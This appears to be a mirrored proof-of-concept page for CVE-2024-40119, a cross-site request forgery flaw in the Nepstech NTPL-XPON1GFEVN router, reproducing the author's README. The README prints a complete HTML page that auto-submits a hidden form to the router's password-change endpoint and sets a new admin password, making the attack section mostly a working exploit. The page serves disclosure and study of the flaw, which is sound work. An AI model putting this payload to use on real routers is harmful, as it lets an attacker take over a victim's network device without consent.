Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2024-40119 PoC — Nepstech NTPL-XPON1GFEVN 安全漏洞

Source
https://github.com/baroi-ai/nepstech-xpon-router-CVE-2024-40119
Associated Vulnerability
Title:Nepstech NTPL-XPON1GFEVN 安全漏洞 (CVE-2024-40119)
Description:Nepstech NTPL-XPON1GFEVN是Nepstech公司的一款无线路由器。 Nepstech NTPL-XPON1GFEVN 1.0固件2.0.1版本存在安全漏洞,该漏洞源于密码更改功能中存在跨站请求伪造(CSRF)漏洞,导致攻击者可通过更改管理员密码进行帐户接管。
Description
Cross-Site Request Forgery (CSRF) vulnerability in the password  change function, which allows remote attackers to change the admin  password without the user's consent, leading to a potential account  takeover.
Readme
# nepstech-xpon-router-CVE-2024-40119

# Author:
Subhodeep Baroi

# CVE-2024-40119: CSRF Vulnerability in Nepstech Wifi Router NTPL-XPON1GFEVN v1.0

## Description

**CVE-2024-40119** is a Cross-Site Request Forgery (CSRF) vulnerability in the Nepstech Wifi Router xpon NTPL-XPON1GFEVN v1.0 firmware v2.0.1. This vulnerability allows remote attackers to change the admin password without the user's consent, leading to a potential account takeover.

## Details

- **Vulnerability Type:** Cross-Site Request Forgery (CSRF)
- **Vendor of Product:** Nepstech
- **Affected Product Code Base:** Wifi Router xpon (terminal) - Model: NTPL-XPON1GFEVN - Version: 1.0 and Firmware: V2.0.1
- **Affected Component:** Router web app password-changing functionality
- **Attack Type:** Remote
- **Impact:** Admin Account Takeover

## Attack Vectors

A remote attacker can craft a malicious HTML page that triggers the password change functionality when visited by an authenticated user. Below is a sample attack vector:

```html
<!DOCTYPE html>
<html>
  <body>
    <form action="http://192.168.1.1/cgi-bin/mag-account.asp" method="POST">
      <input type="hidden" name="name0" value="admin" />
      <input type="hidden" name="name1" value="user" />
      <input type="hidden" name="name2" value="user3" />
      <input type="hidden" name="oldUsername" value="admin" />
      <input type="hidden" name="newUsername" value="" />
      <input type="hidden" name="oldPassword" value="" />
      <input type="hidden" name="newPassword" value="UserUser2&#64;" />
      <input type="hidden" name="cfmPassword" value="UserUser2&#64;" />
      <input type="hidden" name="accountflg" value="1" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>
File Snapshot

 [4.0K]  /data/pocs/041f5204b635e436c0ba0e133539b4d6d0655784
└── [1.8K]  README.md

0 directories, 1 file
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.